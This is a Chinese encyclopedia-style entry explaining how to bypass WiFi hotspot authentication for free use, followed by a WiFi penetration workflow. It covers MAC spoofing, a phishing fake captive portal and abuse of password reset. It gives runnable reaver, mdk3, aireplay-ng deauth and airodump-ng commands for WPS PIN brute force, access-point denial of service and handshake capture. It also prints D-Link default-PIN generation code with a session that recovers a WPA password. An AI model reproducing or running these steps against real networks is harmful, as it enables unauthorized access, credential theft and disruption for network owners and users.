词条信息

admin
admin
超级管理员
最近编辑者 发短消息   

相关词条

热门词条

更多>>
什么是端口?到底是做什么的呢?
端口一般指两种,一种是硬件比如路由器或者交换机的插网线的端口,一种是软件的逻辑的概念,比如http的80端口!...
7种进阶方法让你快速测试端口连通性
Ping是Windows、Linux和Unix系统下的一个检查网络连通性的命令工具,对于大部分互联网用户来说很...
电脑开机,总需要按F1,是什么原因造成的?
一.主板掉电这个说法是行业内的叫法了,一般是主板的CMOS电池没电了导致的。也是最常见的一种提示你按F1的提示...
社保降费对个人有什么影响?
下调城镇职工基本养老保险单位缴费比例是政府给企业发的一个大红包,特别是对于企业来说是一个利好,但是对个人来说有...
车辆“出险”对下年保费的影响,到底有多大?
【出险对交强险的影响】【出险对商业险的影响】车辆“出险”对下年保费的影响,到底有多大?这里有必要先提下车险第三...

精选图集

更多>>
简易百科旧版 >>所属分类 >> 安全防护    黑客技术   

黑客怎么绕过热点验证免费来使用WiFi的

标签: 黑客 wifi 热点验证

顶[0] 发表评论(0) 编辑词条

黑客怎么绕过热点验证来免费使用wifi,是很多朋友们比较关心的,针对这些以下业内专家就来告诉大家,希望大家能够认真阅读。

  • 方法一:使用MAC地址伪造法。很多时候开放网络的身份验证往往就是通过上网设备的MAC地址连同上网凭证以一起实现的,无线网络安全存在哪些问题?不过由于任何设备的MAC地址都容易进行修改,包括智能手机和笔记本电脑等,也就是这种验证方法根本不是一种强健或者最安全的验证方法;也正是如此,黑客要做的就是进行扫描整个网络以能寻找其他已经连接上该网络的客户端,而实现这种目的的最快方式就是要利用ARP扫描技术,这样就能给提供一种包含所有连接设备的IP地址和MAC地址的完整ARP表;为了能够有效提高查看的速度,黑客也会尝试进行检测这些设备是否能够产生通信流量,当产生有通信流量就要拦截这种流量并查看是否是上网的网络流量;当这些条件都能满足后,就能非常容易通过网络认证门户的身份验证免费的使用wifi了。

  • 方法二:使用伪造认证页面方法。黑客使用这种方法就类似钓鱼,当创建一个伪造身份认真页面后就能迫使正常用户登录该页面进行身份验证,然后也就能盗取他们的上网凭证了;毕竟一般开放的wifi网络的所有流量都是一种未经加密的明文数据,这样黑客就能非常方便的进行拦截并篡改网络流量以达到想要做任何事情的目的;可能一些时候认证页面时通过HTTPS进行连接的,但是它们机会所有时候也都会使用同一个定制证书;大家更需要知道的是,黑客为了能够建立一个假的认证门户,往往还会下载原来真正的认证页面,然后进行编辑该门户网站来存储用户输入的上网凭证信息最后就能将信息转发到原始真正的认证页面中来达到身份认证的目的。

  • 方法三:利用忘记密码的方法来进行。黑客使用这种方法十分简单,就是抓住带身份验证的wifi热点会在忘记密码时候能提供重置密码进行服务,这种服务往往也是能通过连接者的手机号码来进行实现,需要能够向填入的手机号码上发送相关新密码,甚至很多时候还需通过电子邮件来发送新密码;在这种情况下就会允许连接客户端的TMAP/POP邮件服务器,也就意味能避免使用网络来查看邮箱了。

wifi渗透流程整理


整理了一下工具的使用


1. 流程图

2. 获取bssid和essid

reference:https://www.aircrack-ng.org/documentation.html


3. 探测是否开启wps(Wi-Fi protected setup)

command:

  1. airodump-ng MB,wash -i mon0 -C 

54e.:默认开启wps,54e:默认不开启

当我们为wifi设置了一个复杂的密码时,每次接入一个新的设备都要重复输入这个密码,过程略微繁琐,wps的出现就是为了解决这个问题。

它提供了一个8位纯数字的秘钥,认证成功即可连接wifi。

但是这8位数是分开认证的,先验证前4位,再验证5-7位,所以最多只需要爆破11000-1次即可成功。

少数路由器wps开启与否是由按钮控制,在能物理接触路由器的情况下,可以手动开启。

reference:

http://www.howtogeek.com/176124/wi-fi-protected-setup-wps-is-insecure-heres-why-you-should-disable-it/


4. 探测pin

command:

  1. reaver -i mon0 -b ap_bssid -vv 

(1) ap denial service

当路由器不再响应的时候,可以用DoS攻击让ap拒绝服务,受害者重启路由.

常用的就是authentication flood attack,攻击者可以伪造源MAC地址(基于802.11的报文发送机制)发送authenticate到目标AP,重复发送这种请求,最终会耗尽AP内存导致拒绝服务.

command:

  1. mdk3 a mon0 -a bssid -c 

reference:

  • https://www.sans.org/reading-room/whitepapers/wireless/80211-denial-service-attacks-mitigation-2108
  • http://tools.kali.org/wireless-attacks/mdk3
  • http://xiao106347.blog.163.com/blog/static/215992078201425920197

(2) get password

reference:

  • http://tools.kali.org/wireless-attacks/reaver
  • http://null-byte.wonderhowto.com/how-to/hack-wpa-wifi-passwords-by-cracking-wps-pin-0132542/
  • https://www.pwnieexpress.com/blog/wps-cracking-with-reaver
  • http://lifehacker.com/5873407/how-to-crack-a-wi-fi-networks-wpa-password-with-reaver

5. 利用算法漏洞直接获取pin

devttys0站长通过逆向D-link、belkin固件的wps pin生成算法,直接得到默认pin码.

以d-link为例,获取ap bssid,拆分后进行异或、与、移位等操作生成pin,伪c代码如下:

  1. unsigned int generate_default_pin(char *buf) 
  2. { 
  3.  char *mac; 
  4.  char mac_address[32] = { 0 }; 
  5.  unsigned int oui, nic, pin; 
  6. /* Get a pointer to the WAN MAC address */ 
  7. mac = lockAndGetInfo_log()->wan_mac_address; 
  8. /* 
  9.  * Create a local, NULL-terminated copy of the WAN MAC (simplified from 
  10.  * the original code's sprintf/memmove loop). 
  11.  */ 
  12.  sprintf(mac_address, "%c%c%c%c%c%c%c%c%c%c%c%c", mac[0], 
  13.  mac[1], 
  14.  mac[2], 
  15.  mac[3], 
  16.  mac[4], 
  17.  mac[5], 
  18.  mac[6], 
  19.  mac[7], 
  20.  mac[8], 
  21.  mac[9], 
  22.  mac[10], 
  23.  mac[11]); 
  24. /* 
  25.  * Convert the OUI and NIC portions of the MAC address to integer values. 
  26.  * OUI is unused, just need the NIC. 
  27.  */ 
  28.  sscanf(mac_address, "%06X%06X", &oui, &nic); 
  29. /* Do some XOR munging of the NIC. */ 
  30. pin = (nic ^ 0x55AA55); 
  31. pinpin = pin ^ (((pin & 0x0F) <<4) + 
  32.  ((pin & 0x0F) <<8) + 
  33.  ((pin & 0x0F) <<12) + 
  34.  ((pin & 0x0F) <<16) + 
  35.  ((pin & 0x0F) <<20)); 
  36. /* 
  37.  * The largest possible remainder for any value divided by 10,000,000 
  38.  * is 9,999,999 (7 digits). The smallest possible remainder is, obviously, 0. 
  39.  */ 
  40. pinpin = pin % 10000000; 
  41. /* The pin needs to be at least 7 digits long */ 
  42.  if(pin <1000000) 
  43.  { 
  44.  /* 
  45.  * The largest possible remainder for any value divided by 9 is 
  46.  * 8; hence this adds at most 9,000,000 to the pin value, and at 
  47.  * least 1,000,000. This guarantees that the pin will be 7 digits 
  48.  * long, and also means that it won't start with a 0. 
  49.  */ 
  50.  pin += ((pin % 9) * 1000000) + 1000000; 
  51.  } 
  52. /* 
  53.  * The final 8 digit pin is the 7 digit value just computed, plus a 
  54.  * checksum digit. Note that in the disassembly, the wps_pin_checksum 
  55.  * function is inlined (it's just the standard WPS checksum implementation). 
  56.  */ 
  57. pin = ((pin * 10) + wps_pin_checksum(pin)); 
  58. sprintf(buf, "%08d", pin); 
  59.  return pin; 
  60. } 
  61. $ sudo airodump-ng mon0 -c 4 
  62. CH 4 ][ Elapsed: 0 s ][ 2014-09-11 11:44 ][ fixed channel mon0: -1 
  63. BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 
  64. C0:A0:BB:EF:B3:D6 -13 0 6 0 0 4 54e WPA2 CCMP PSK dlink-B3D6 
  65. $ ./pingen C0:A0:BB:EF:B3:D7 # <--- WAN MAC is BSSID+1 
  66. Default Pin: 99767389 
  67. $ sudo reaver -i mon0 -b C0:A0:BB:EF:B3:D6 -c 4 -p 99767389 
  68. Reaver v1.4 WiFi Protected Setup Attack Tool 
  69. Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
  70. [+] Waiting for beacon from C0:A0:BB:EF:B3:D6 
  71. [+] Associated with C0:A0:BB:EF:B3:D6 (ESSID: dlink-B3D6) 
  72. [+] WPS PIN: '99767389' 
  73. [+] WPA PSK: 'hluig79268' 
  74. [+] AP SSID: 'dlink-B3D6' 


6. 密码相关app被共享

zke1ev3n大牛逆向了万能钥匙APP,发现发送的AP相关的信息经过了AES加密,私钥和IV都硬编码在程序中. 设备指纹放在sign字段,经过md5(设备指纹信息+salt)加密,salt也硬编码在程序中,这部分信息当做签名来验证请求是否合法。

返回信息同样经过AES加密,用的相同的key和IV。

http://www.wifi4.cn实现了这个加密流程.

reference:

  • http://zke1ev3n.me/2016/04/06/WiFi%E4%B8%87%E8%83%BD%E9%92%A5%E5%8C%99%E6%8E%A5%E5%8F%A3%E5%8D%8F%E8%AE%AE%E7%A0%B4%E8%A7%A3/
  • https://github.com/Zke1ev3n/WiFiMaster/blob/master/WiFiMaster.py

7. mac白名单限制

mac address被烧录在网卡的EEPROM中,每次网卡初始化时会从EEPROM中读取mac地址并将其写入到一个缓冲区(win下是写到注册表)

发送报文时,相关api读取mac地址是从缓冲区中读取,而不是去EEPROM中.

command:

  • airodump-ng mon0 (获得已连接到AP的client bssid)
  • ifconfig wlan0 hw ether 00:01:02:03:04:05.

reference:

  • https://en.wikipedia.org/wiki/MAC_spoofing
  • https://collegetimes.co/change-mac-address/

http://xiao106347.blog.163.com/blog/static/21599207820131014101844104/


8. 抓取握手包

(1)

  1. airodump-ng -w /tmp/test.cap-c channelNum --bssid apm 

(2) deauth client

  1. Wi-Fi deauthentication attack 

IEEE 802.11协议中包含了deauthentication frame,用来中断server和client的认证.

攻击者只需知道client bssid,基于报文发送机制,伪造mac,可以在任何时间向AP发送deauthentication请求.

如果这个攻击是持续的,目标client会无法连接AP. 其实这个时候可以结合pineapple伪造AP准备嗅探了.

command:

aireplay-ng-0 攻击次数 -a apmac -c clientmac -x 发包速率 mon1

reference:

  • https://en.wikipedia.org/wiki/Wi-Fi_deauthentication_attack
  • https://www.sans.org/reading-room/whitepapers/wireless/80211-denial-service-attacks-mitigation-2108

(3) get handshake

 

 

附件列表


按字母顺序浏览:A B C D E F G H I J K L M N O P Q R S T U V W X Y Z

→我们致力于为广大网民解决所遇到的各种电脑技术问题
 如果您认为本词条还有待完善,请 编辑词条

上一篇网络攻击新载体:API
下一篇顶级黑客一定要懂得基本技术!

0
1. 本站部分内容来自互联网,如有任何版权侵犯或其他问题请与我们联系,我们将立即删除或处理。
2. 本站内容仅供参考,如果您需要解决具体问题,建议您咨询相关领域专业人士。
3. 如果您没有找到需要的百科词条,您可以到百科问答提问或创建词条,等待高手解答。

关于本词条的提问

查看全部/我要提问>>